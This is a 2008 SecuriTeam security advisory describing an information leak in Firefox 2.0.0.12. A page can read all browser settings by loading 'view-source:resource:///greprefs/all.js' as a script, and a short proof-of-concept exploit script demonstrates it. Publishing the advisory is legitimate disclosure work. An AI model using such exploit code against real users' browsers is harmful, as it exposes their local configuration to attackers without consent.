[NEWS] Firefox Information Leak Vulnerability



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Firefox Information Leak Vulnerability
------------------------------------------------------------------------


SUMMARY

A vulnerability in Firefox allows remote attackers to enumerate all the
configuration settings of the browser without requiring user authorization
or interaction.

DETAILS

Vulnerable Systems:
* Firefox version 2.0.0.12

In the vulnerability we make use of the 'view-source:' scheme that allows
us to source out the 'resource:' scheme. With it, we can view the source
of any file located in the 'resource:///' directory, which translates back
to: file:///C:/Program Files/Mozilla Firefox/. Then we only include the
file inside it and it becomes available to a new page's DOM, and so we are
able to read all settings.

Other issues can emerge also, this is only a short-hand proof of concept.
Like always, more is possible.

Exploit:
<script>

/*
@name: Firefox <= 2.0.0.12 information leak pOc
@date: Feb. 07 2008
@author: Ronald van den Heetkamp
@url: http://www.0x000000.com
*/

pref = function(a,b) {

document.write( a + ' -> ' + b + '<br />');

};

</script>

<script src="view-source:resource:///greprefs/all.js"></script>


ADDITIONAL INFORMATION

The information has been provided by <mailto:hardwick.carl@xxxxxxxxx>
carl hardwick.
The original article can be found at: <http://www.0x000000.com/>
http://www.0x000000.com/



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [NEWS] Unpatched Input Validation Flaw in Firefox (Directory Traversal)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Unpatched Input Validation Flaw in Firefox ... that allowed you to read local files through the resource protocol. ... the patch only partially fixed the vulnerability on Windows ...
    (Securiteam)
  • [NEWS] Firefox Same-Domain Bypass Vulnerability (NULL Character)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Firefox Same-Domain Bypass Vulnerability ... cookies for *.example.com; he'll be also able to alter document.domain ...
    (Securiteam)
  • [NEWS] Gecko Based Browsers CSS Letter-Spacing Integer Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Firefox version 1.5.0.1 and prior ... Thunderbird version 1.5 and above ... This vulnerability allows attackers to execute arbitrary code on ...
    (Securiteam)
  • [NEWS] Gecko Based Browser IDN Buffer Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Meaning, Firefox appends 0 to ... Mozilla foundeation has released a patch for Firefox: ...
    (Securiteam)
  • [NEWS] Multiple Browsers File Upload Data Disclosure
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The problem exists both with Internet Explorer and Firefox, ... attackers can upload sensitive information from client ... var saved; ...
    (Securiteam)